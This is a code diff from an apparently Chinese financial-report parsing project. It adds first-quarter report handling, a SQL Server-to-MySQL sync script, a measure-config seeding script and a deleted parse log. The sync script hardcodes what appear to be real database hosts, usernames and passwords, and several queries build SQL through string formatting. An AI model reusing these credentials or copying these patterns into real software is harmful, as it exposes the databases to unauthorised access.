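print(pattern_dup.sub(r'\1', '营业收入营业收入'))        # -> 营业收入
print(pattern_dup.sub(r'\1', '第一季度第一季度净利润'))  # -> 第一季度净利润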
@ -822,7 +882,6 @@ def delete_database(file_id):
"delete from measure_list where file_id = %s;",
"delete from word_parse_process where file_id = %s;",
"delete from table_unit_info where file_id = %s;",
"delete from word_measure_parse_process where file_id = %s;",
# "delete from a where file_id = %s;",
# "delete from b where file_id = %s;",
]
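Taken together, the hunks above wire first-quarter reports (report_type == 2) into the dispatch that already covered annual, half-year and third-quarter reports. Condensed, the mapping the code now implements (the half-year table name is an assumption; it is not visible in these hunks):

# report_type -> measure-config table consulted by update_ori_measure and
# insert_table_measure_from_vector_async_process
CONFIG_TABLE = {
    0: "measure_config",                # annual report
    1: "measure_config_half_year",      # half-year report (assumed name)
    2: "measure_config_first_quarter",  # first-quarter report, added here
    3: "measure_config_third_quarter",  # third-quarter report
}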

201
zzb_data_word/db_update.py Normal file
View File

@ -0,0 +1,201 @@
import pymssql
import mysql.connector
import logging
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# SQL Server configuration
sql_server_config = {
"server": "203.192.15.17",
"port": 28063,
"user": "zncbuser",
"password": "ZZB-Cbindex-data",
"database": "jydb",
}
# MySQL configuration
mysql_config = {
"host": "rm-bp1f85h3xs6mvnf5e3o.mysql.rds.aliyuncs.com",
"user": "zzb_jydb",
"password": "Ysdbsdjs89Yrqwp",
"database": "zzb_jydb",
}
def sync_table(table_name):
try:
# Connect to SQL Server
sql_server_conn = pymssql.connect(**sql_server_config)
sql_server_cursor = sql_server_conn.cursor()
# Connect to MySQL
mysql_conn = mysql.connector.connect(**mysql_config)
mysql_cursor = mysql_conn.cursor()
logging.info(f"Processing table: {table_name}")
# Check whether the table already exists in MySQL
mysql_cursor.execute(f"SHOW TABLES LIKE '{table_name}'")
table_exists = mysql_cursor.fetchone()
# Fetch the table's column metadata
sql_server_cursor.execute(f"""
SELECT
COLUMN_NAME,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = '{table_name}'
""")
columns = sql_server_cursor.fetchall()
# Check for an XGRQ or UpdateTime column
update_time_fields = ['xgrq', 'updatetime']  # candidate column names
update_time_field = None
for col in columns:
if col[0].lower() in update_time_fields:
update_time_field = col[0]  # take the first matching column
break
logging.info(f"Table {table_name} has update time field: {update_time_field}")
if not table_exists:
# Create the table if it does not exist
create_table_sql = f"CREATE TABLE {table_name} ("
for col in columns:
col_name = col[0]
col_type = col[1]
# type-mapping logic (omitted)
create_table_sql += f"`{col_name}` {col_type}, "
create_table_sql = create_table_sql.rstrip(", ") + ")"
logging.info(f"Create table SQL: {create_table_sql}")
# Create the table in MySQL
mysql_cursor.execute(create_table_sql)
logging.info(f"Table {table_name} created in MySQL.")
else:
logging.info(f"Table {table_name} already exists in MySQL. Updating data...")
# Fetch all ids from SQL Server
sql_server_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
sql_server_ids = {row[0] for row in sql_server_cursor.fetchall()}
# Fetch all ids from MySQL
mysql_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
mysql_ids = {row[0] for row in mysql_cursor.fetchall()}
# Work out which ids need inserting
ids_to_insert = sql_server_ids - mysql_ids
logging.info(f"Found {len(ids_to_insert)} new rows to insert.")
# Insert the data in batches
batch_size = 10000  # rows per batch
id_list = list(ids_to_insert)
for i in range(0, len(id_list), batch_size):
batch_ids = id_list[i:i + batch_size]
# Pull the rows to insert from SQL Server
sql_server_cursor.execute(f"""
SELECT * FROM {table_name}
WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
""")
rows_to_insert = sql_server_cursor.fetchall()
# Insert the rows into MySQL
if rows_to_insert:
insert_sql = f"INSERT INTO {table_name} ({', '.join([f'`{col[0]}`' for col in columns])}) VALUES ({', '.join(['%s'] * len(columns))})"
mysql_cursor.executemany(insert_sql, rows_to_insert)
mysql_conn.commit()
logging.info(f"Inserted {len(rows_to_insert)} rows into {table_name}.")
# If an update-time column (XGRQ or UpdateTime) exists, check for rows that changed
if update_time_field:
logging.info(f"Checking for updates based on {update_time_field} field in table: {table_name}")
# Fetch ids and update-time values from SQL Server where the update time is later than 2023
sql_server_cursor.execute(f"""
SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
WHERE {update_time_field} > '2023-11-12 20:23:23'
""")
sql_server_update_data = {row[0]: row[1] for row in sql_server_cursor.fetchall()}
# Fetch ids and update-time values from MySQL
mysql_cursor.execute(f"""
SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
""")
mysql_update_data = {row[0]: row[1] for row in mysql_cursor.fetchall()}
# Work out which ids need updating
ids_to_update = []
for id, sql_server_update_time in sql_server_update_data.items():
if id in mysql_update_data and sql_server_update_time != mysql_update_data[id]:
ids_to_update.append(id)
logging.info(f"Found {len(ids_to_update)} rows to update.")
# Update the data in batches
for i in range(0, len(ids_to_update), batch_size):
batch_ids = ids_to_update[i:i + batch_size]
# Pull the rows to update from SQL Server (update time later than 2023)
sql_server_cursor.execute(f"""
SELECT * FROM {table_name}
WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
AND {update_time_field} > '2023-11-12 20:23:23'
""")
rows_to_update = sql_server_cursor.fetchall()
# Write the updated rows to MySQL
if rows_to_update:
update_sql = f"UPDATE {table_name} SET "
update_sql += ", ".join([f"`{col[0]}` = %s" for col in columns[1:]])  # skip the id column
update_sql += f" WHERE `{columns[0][0]}` = %s"
update_values = [list(row[1:]) + [row[0]] for row in rows_to_update]  # id moves to the end for the WHERE clause
mysql_cursor.executemany(update_sql, update_values)
mysql_conn.commit()
logging.info(f"Updated {len(rows_to_update)} rows in table {table_name}.")
logging.info(f"Sync completed for table: {table_name}")
except Exception as e:
logging.error(f"Failed to sync table {table_name}. Error: {e}")
finally:
# Close connections
if 'sql_server_cursor' in locals():
sql_server_cursor.close()
if 'sql_server_conn' in locals():
sql_server_conn.close()
if 'mysql_cursor' in locals():
mysql_cursor.close()
if 'mysql_conn' in locals():
mysql_conn.close()
def main():
try:
# Connect to SQL Server
sql_server_conn = pymssql.connect(**sql_server_config)
sql_server_cursor = sql_server_conn.cursor()
# List all base tables in SQL Server
sql_server_cursor.execute("SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' ORDER BY TABLE_NAME")
tables = sql_server_cursor.fetchall()
# Process each table
for table in tables:
if table[0].lower() == "lc_mainshlistnew":
sync_table(table[0])
logging.info("All tables synced successfully!")
except Exception as e:
logging.error(f"Main function failed. Error: {e}")
finally:
# Close connections
if 'sql_server_cursor' in locals():
sql_server_cursor.close()
if 'sql_server_conn' in locals():
sql_server_conn.close()
# Entry point
if __name__ == "__main__":
main()
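sync_table batches both its insert pass and its update pass 10000 ids at a time. The slicing idiom it repeats, isolated as a small illustration (chunks is not a function defined in this file):

def chunks(seq, size=10000):
    # Yield consecutive fixed-size slices of seq; the last slice may be shorter.
    for i in range(0, len(seq), size):
        yield seq[i:i + size]

print([len(batch) for batch in chunks(list(range(25000)))])  # [10000, 10000, 5000]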

File diff suppressed because it is too large

View File

@ -0,0 +1,294 @@
import pandas as pd
import mysql.connector
import utils
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
import re
import redis
def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
# Read the first Excel file
df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)  # corresponds to the ttt sheet
# Convert the DataFrame to a list of dicts
data_list = df.to_dict(orient='records')
# Connect to the MySQL database
conn = mysql.connector.connect(
host=MYSQL_HOST,
user=MYSQL_USER,
password=MYSQL_PASSWORD,
database=MYSQL_DB
)
cursor = conn.cursor()
# Insert rows into the measure_create_config table
insert_query = '''
INSERT INTO measure_create_config
(config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
VALUES (%s, %s, %s, %s, %s, %s)
'''
for data in data_list:
show_measure = str(data['指标'])
same_mean_measure = str(data['同义表述'])
period_measure = str(data['周期'])
change_measure = str(data['变动'])
black_list = str(data['黑名单词'])
config_id = utils.get_md5(show_measure)
insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
cursor.execute(insert_query, insert_query_data)
conn.commit()
# Read the second Excel file
df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)  # corresponds to the period sheet
# Convert the DataFrame to a list of dicts
period_list = df_period.to_dict(orient='records')
# Insert rows into the measure_create_period table
period_insert_query = '''
INSERT INTO measure_create_period
(period_name, same_mean_period)
VALUES (%s, %s)
'''
for data in period_list:
period_name = str(data['标准表述'])
same_mean_period = str(data['同义表述'])
insert_query_data = (period_name, same_mean_period)
cursor.execute(period_insert_query, insert_query_data)
conn.commit()
# Query the database
data_query = '''
SELECT * FROM measure_create_config WHERE delete_status = 0
'''
period_query = '''
SELECT * FROM measure_create_period
'''
cursor.execute(data_query)
data_list = cursor.fetchall()
cursor.execute(period_query)
period_list = cursor.fetchall()
# Write the results to the output file
with open(output_file_path, 'w', encoding='utf-8') as file:
for data in data_list:
config_id = data[0]
show_measure = data[1]
same_mean_measure = data[2]
period_measure = data[3]
change_measure = data[4]
same_mean_measure_arr = []
period_measure_arr = []
change_measure_arr = []
if same_mean_measure != 'nan':
same_mean_measure_arr = same_mean_measure.split(',')
same_mean_measure_arr.append(show_measure)
if period_measure != 'nan':
period_measure_arr = period_measure.split(',')
if change_measure != 'nan':
change_measure_arr = change_measure.split(',')
for c in change_measure_arr:
period_measure_arr.append(c)
for x in period_measure_arr:
if x in change_measure_arr:
show_name = show_measure + x
else:
show_name = x + show_measure
for y in same_mean_measure_arr:
if x in change_measure:
parser_name = y + x
else:
parser_name = x + y
file.write(f'{show_name},{parser_name}\n')
for p in period_list:
period_exra_name = p[0]
period_exra_value = p[1]
if period_exra_name in x:
for v in period_exra_value.split(','):
if x in change_measure:
parser_name = y + x.replace(period_exra_name, v)
else:
parser_name = x.replace(period_exra_name, v) + y
file.write(f'{show_name},{parser_name}\n')
cursor.close()
conn.close()
# Generate a new measure-config table from the old one
def create_new_config(conn, cursor, table_name,old_year,new_year):
select_query = f'''
SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
FROM {table_name}
WHERE year = '{old_year}'
'''
cursor.execute(select_query)
data_list = cursor.fetchall()
insert_query = f'''
INSERT INTO measure_config
(measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
'''
for data in data_list:
ori_measure_name = data[3]
if re.match(r'^\d{4}',ori_measure_name):
year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
year += 1
ori_measure_name = str(year) + ori_measure_name[4:]
insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
cursor.execute(insert_query, insert_data)
conn.commit()
cursor.close()
conn.close()
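create_new_config clones last year's rows and, whenever an ori_measure_name begins with a four-digit year, bumps that year by one. A worked example of the regex step:

import re

name = '2023年6月30日货币资金'
m = re.match(r'^\d{4}', name)
if m:
    name = str(int(m.group(0)) + 1) + name[4:]
print(name)  # 2024年6月30日货币资金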
def measure_config_to_db(conn, cursor, table_name):
year_list = ["2021","2022","2023","2024","2025"]
for year in year_list:
insert_query = f'''
INSERT INTO {table_name}
(measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year)
VALUES (%s, %s, %s, %s,%s,%s,%s)
'''
check_query = f'''
SELECT ori_measure_id FROM {table_name}
WHERE year = '{year}'
'''
        # Newly added measures: each line is "measure_name,ori_measure_name"
lines = [
f"归母净利润同比变动,本报告期比上年同期增减归属于上市公司股东的净利润",
f"扣非净利润同比变动,本报告期比上年同期增减归属于上市公司股东的扣除非经常性损益的净利润",
# f"当期营业成本,本期发生额营业成本",
# f"当期销售费用,本期发生额销售费用",
# f"当期管理费用,本期发生额管理费用",
# f"当期财务费用,本期发生额财务费用",
# f"当期研发费用,本期发生额研发费用",
# f"报告期末应收账款,本期发生额应收账款",
# f"当期营业收入,本期发生额营业收入",
# f"当期营业成本,{year}年第一季度营业成本",
# f"当期销售费用,{year}年第一季度销售费用",
# f"当期管理费用,{year}年第一季度管理费用",
# f"当期财务费用,{year}年第一季度财务费用",
# f"当期研发费用,{year}年第一季度研发费用",
# f"报告期末应收账款,{year}年3月31日应收账款",
# f"当期营业收入,{year}年第一季度营业收入",
# f"报告期末总资产,{year}年3月31日资产",
# f"报告期末总资产,{year}年3月31日资产总计",
# f"报告期末货币资金,{year}年3月31日货币资金",
# f"报告期末货币资金,{year}年3月31日货币资金合计",
# f"报告期末存货,{year}年3月31日存货",
# f"报告期末存货,{year}年3月31日存货合计",
# f"报告期末固定资产,{year}年3月31日固定资产",
# f"报告期末固定资产,{year}年3月31日固定资产合计",
# f"报告期末在建工程,{year}年3月31日在建工程",
# f"报告期末在建工程,{year}年3月31日在建工程合计",
# f"报告期末商誉,{year}年3月31日商誉",
# f"报告期末商誉,{year}年3月31日商誉合计",
# f"报告期末短期借款,{year}年3月31日短期借款",
# f"报告期末短期借款,{year}年3月31日短期借款合计",
# f"报告期末应付账款,{year}年3月31日应付账款",
# f"报告期末应付账款,{year}年3月31日应付账款合计",
# f"报告期末合同负债,{year}年3月31日合同负债",
# f"报告期末合同负债,{year}年3月31日合同负债合计",
# f"报告期末长期借款,{year}年3月31日长期借款",
# f"报告期末长期借款,{year}年3月31日长期借款合计",
# f"上年年末总资产,{int(year)-1}年12月31日资产",
# f"上年年末总资产,{int(year)-1}年12月31日资产总计",
# f"上年年末货币资金,{int(year)-1}年12月31日货币资金",
# f"上年年末货币资金,{int(year)-1}年12月31日货币资金合计",
# f"上年年末存货,{int(year)-1}年12月31日存货",
# f"上年年末存货,{int(year)-1}年12月31日存货合计",
# f"上年年末固定资产,{int(year)-1}年12月31日固定资产",
# f"上年年末固定资产,{int(year)-1}年12月31日固定资产合计",
# f"上年年末在建工程,{int(year)-1}年12月31日在建工程",
# f"上年年末在建工程,{int(year)-1}年12月31日在建工程合计",
# f"上年年末商誉,{int(year)-1}年12月31日商誉",
# f"上年年末商誉,{int(year)-1}年12月31日商誉合计",
# f"上年年末短期借款,{int(year)-1}年12月31日短期借款",
# f"上年年末短期借款,{int(year)-1}年12月31日短期借款合计",
# f"上年年末合同负债,{int(year)-1}年12月31日合同负债",
# f"上年年末合同负债,{int(year)-1}年12月31日合同负债合计",
# f"上年年末长期借款,{int(year)-1}年12月31日长期借款",
# f"上年年末长期借款,{int(year)-1}年12月31日长期借款合计",
]
        # Process each configured line
        for line in lines:
            config_list = line.strip().split(',')
            measure = config_list[0]
            ori_measure = config_list[1]
            ori_measure_id = utils.get_md5(ori_measure)
            # Skip entries already present for this year (keeps the seeding idempotent)
            cursor.execute(check_query)
            check_records = cursor.fetchall()
            if any(record[0] == ori_measure_id for record in check_records):
                continue
            data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure, 0, 0.94, year)
            cursor.execute(insert_query, data_to_insert)
        conn.commit()
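Because the row id is just the MD5 of the measure text, re-running the seeding never duplicates a row: an existing ori_measure_id is skipped. A sketch of that check, under the assumption that utils.get_md5 is a plain MD5 over the UTF-8 bytes:

# Sketch of the idempotency check; get_md5 here is an assumed
# re-implementation of utils.get_md5 (plain MD5 of the UTF-8 text).
import hashlib

def get_md5(s: str) -> str:
    return hashlib.md5(s.encode('utf-8')).hexdigest()

existing_ids = {get_md5('本报告期比上年同期增减归属于上市公司股东的净利润')}
candidate = '本报告期比上年同期增减归属于上市公司股东的净利润'
if get_md5(candidate) in existing_ids:
    print('skip: already seeded')  # the INSERT is never executed twice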
def insert_measure_vector(conn, cursor, table_name):
    from config import REDIS_HOST, REDIS_PASSWORD, REDIS_PORT
    redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)  # 192.168.0.172; test env: 123.60.153.169
    # Fetch every configured measure and make sure its embedding vector is cached
select_query = f'''
SELECT ori_measure_id,ori_measure_name FROM {table_name}
'''
cursor.execute(select_query)
records = cursor.fetchall()
print(f"总计{len(records)}条数据")
for record in records:
if redis_client.hexists('measure_config', record[0]):
measure_vector = redis_client.hget('measure_config', record[0])
else:
print('新增指标',record[1])
vector_obj = utils.embed_with_str(record[1])
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
redis_client.hset('measure_config', record[0], measure_vector)
redis_client.close()
conn.close()
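insert_measure_vector is a cache-aside loop: each measure's embedding is looked up in the Redis hash measure_config keyed by its MD5, and only computed on a miss (utils.embed_with_str wraps the DashScope text-embedding call). The pattern, reduced to its core:

# Cache-aside pattern used above, reduced to its core; get_embedding
# stands in for utils.embed_with_str and is an assumed callable.
import redis

def cached_vector(r: redis.Redis, measure_id: str, measure_name: str, get_embedding):
    if r.hexists('measure_config', measure_id):
        return r.hget('measure_config', measure_id)   # hit: reuse the stored vector
    vector = str(get_embedding(measure_name))         # miss: embed exactly once
    r.hset('measure_config', measure_id, vector)      # memoize for the next run
    return vector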
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
if __name__ == "__main__":
    # NOTE: clear the local measure_create_config and measure_create_period tables first
    # process_excel_and_db(
    #     'F:\\11_pdf\\ttt_1.xlsx',            # measure (ttt) file
    #     'F:\\11_pdf\\period_1.xlsx',         # period file
    #     'F:\\11_pdf\\out_2022_new_year.txt'  # output file
    # )
from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
conn = mysql.connector.connect(
host=MYSQL_HOST_APP,
user=MYSQL_USER_APP,
password=MYSQL_PASSWORD_APP,
database=MYSQL_DB_APP
)
cursor = conn.cursor()
#file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
    # Refresh the first-quarter measure_vector config
    table_name = 'measure_config_first_quarter'
    # Seed the config table in MySQL
    # measure_config_to_db(conn, cursor, table_name)
    create_new_config(conn, cursor, table_name, '2024', '2025')
    # Cache the embedding vectors in Redis
    insert_measure_vector(conn, cursor, table_name)

View File

@ -1,204 +0,0 @@
2024-12-29 16:13:29,975|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:13:36,106|zzb_logger : INFO 任务 201917 完成
2024-12-29 16:15:16,205|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:15:22,356|zzb_logger : INFO 任务 201917 完成
2024-12-29 16:17:15,693|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=5
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>
2024-12-29 16:17:25,319|zzb_logger : INFO text任务ID:201917
2024-12-29 16:17:26,701|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (5116)...
2024-12-29 16:17:28,173|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (22268)...
2024-12-29 16:17:29,591|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (27736)...
2024-12-29 16:17:30,937|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38276)...
2024-12-29 16:17:32,294|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38292)...
2024-12-29 16:17:33,664|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38240)...
2024-12-29 16:17:35,153|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (28536)...
2024-12-29 16:17:36,559|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37552)...
2024-12-29 16:17:37,929|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37856)...
2024-12-29 16:17:39,291|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (10528)...
2024-12-29 16:17:40,688|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (31444)...
2024-12-29 16:17:42,133|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (11108)...
2024-12-29 16:17:43,518|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23236)...
2024-12-29 16:17:44,901|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23572)...
2024-12-29 16:17:46,495|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (39604)...
2024-12-29 16:17:47,899|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (4076)...
2024-12-29 16:17:47,899|zzb_logger : INFO 等待所有子任务完成任务ID:201917
2024-12-29 16:18:02,194|zzb_logger : INFO word表格中 text解析完成任务ID:201917
2024-12-29 16:18:02,196|zzb_logger : INFO 开始解析word表表格中的table任务ID:201917
2024-12-29 16:18:03,525|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36176)...
2024-12-29 16:18:04,585|zzb_logger : INFO Task 解析表格201917 runs 1.06 seconds.
2024-12-29 16:18:04,873|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35368)...
2024-12-29 16:18:05,769|zzb_logger : INFO Task 解析表格201917 runs 0.90 seconds.
2024-12-29 16:18:06,263|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (33004)...
2024-12-29 16:18:07,225|zzb_logger : INFO Task 解析表格201917 runs 0.96 seconds.
2024-12-29 16:18:07,628|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (30764)...
2024-12-29 16:18:08,427|zzb_logger : INFO Task 解析表格201917 runs 0.80 seconds.
2024-12-29 16:18:08,976|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (29608)...
2024-12-29 16:18:09,864|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:10,588|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (5404)...
2024-12-29 16:18:11,360|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
2024-12-29 16:18:11,966|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36200)...
2024-12-29 16:18:12,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36328)...
2024-12-29 16:18:12,892|zzb_logger : INFO Task 解析表格201917 runs 0.93 seconds.
2024-12-29 16:18:13,034|zzb_logger : INFO Task 解析表格201917 runs 1.00 seconds.
2024-12-29 16:18:13,392|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39712)...
2024-12-29 16:18:14,166|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
2024-12-29 16:18:15,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (17184)...
2024-12-29 16:18:15,084|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38828)...
2024-12-29 16:18:15,156|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39596)...
2024-12-29 16:18:15,194|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36908)...
2024-12-29 16:18:15,268|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38088)...
2024-12-29 16:18:15,273|zzb_logger : INFO 解析表格时出现了异常 setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (8,) + inhomogeneous part. 内容为{'type': 'table', 'index': 1438, 'data': [['项目', '期末', '期末', '期末', '期末', '期末', '期初', '期初', '期初', '期初', '期初', '期初', '期初', '期初'], ['', '账面余额', '账面价值', '受限类型', '受限情况', '受限情况', '账面余额', '账面余额', '账面价值', '账面价值', '受限类型', '受限类型', '受限情况', ''], ['货币资金', '485,532.72', '485,532.72', '', '住房专用基金', '住房专用基金', '482,151.75', '482,151.75', '482,151.75', '482,151.75', '', '', '住房专用基金', ''], ['固定资产', '9,798,299.46', '9,798,299.46', '', '金融机构借款抵押', '3,747,470.09', '3,747,470.09', '3,747,470.09', '3,747,470.09', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['无形资产', '7,982,261.87', '7,982,261.87', '', '金融机构借款抵押', '5,437,462.92', '5,437,462.92', '5,437,462.92', '5,437,462.92', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['货币资金', '43,997,452.57', '43,997,452.57', '', '银行保证金', '63,388,483.00', '63,388,483.00', '63,388,483.00', '63,388,483.00', '', '', '银行保证金', '银行保证金'], ['投资性房地产', '62,041,831.52', '62,041,831.52', '', '金融机构借款抵押', '67,653,392.10', '67,653,392.10', '67,653,392.10', '67,653,392.10', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['合计', '124,305,378.14', '124,305,378.14', '', '', '140,708,959.86', '140,708,959.86', '140,708,959.86', '140,708,959.86', '', '', '', '']]}
2024-12-29 16:18:15,722|zzb_logger : INFO Task 解析表格201917 runs 0.69 seconds.
2024-12-29 16:18:15,873|zzb_logger : INFO Task 解析表格201917 runs 0.79 seconds.
2024-12-29 16:18:16,067|zzb_logger : INFO Task 解析表格201917 runs 0.91 seconds.
2024-12-29 16:18:16,086|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:16,158|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:16,787|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39052)...
2024-12-29 16:18:16,847|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35928)...
2024-12-29 16:18:17,456|zzb_logger : INFO Task 解析表格201917 runs 0.61 seconds.
2024-12-29 16:18:17,644|zzb_logger : INFO Task 解析表格201917 runs 0.86 seconds.
2024-12-29 16:18:17,819|zzb_logger : INFO word表格中 table解析完成任务ID:201917
2024-12-29 16:18:17,985|zzb_logger : INFO 解析任务 201917 完成耗时62.29 秒。
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=6
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>
2024-12-29 16:18:18,107|zzb_logger : INFO 开始表格指标抽取任务ID:201917
2024-12-29 16:18:20,187|zzb_logger : INFO 提取指标任务 0-10 (29656)...
2024-12-29 16:18:21,575|zzb_logger : INFO 提取指标任务 10-20 (38952)...
2024-12-29 16:18:22,849|zzb_logger : INFO 提取指标任务 20-30 (31900)...
2024-12-29 16:18:24,192|zzb_logger : INFO 提取指标任务 30-40 (30420)...
2024-12-29 16:18:25,554|zzb_logger : INFO 提取指标任务 40-50 (32448)...
2024-12-29 16:18:26,909|zzb_logger : INFO 提取指标任务 50-60 (37708)...
2024-12-29 16:18:28,305|zzb_logger : INFO 提取指标任务 60-70 (36136)...
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,936|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
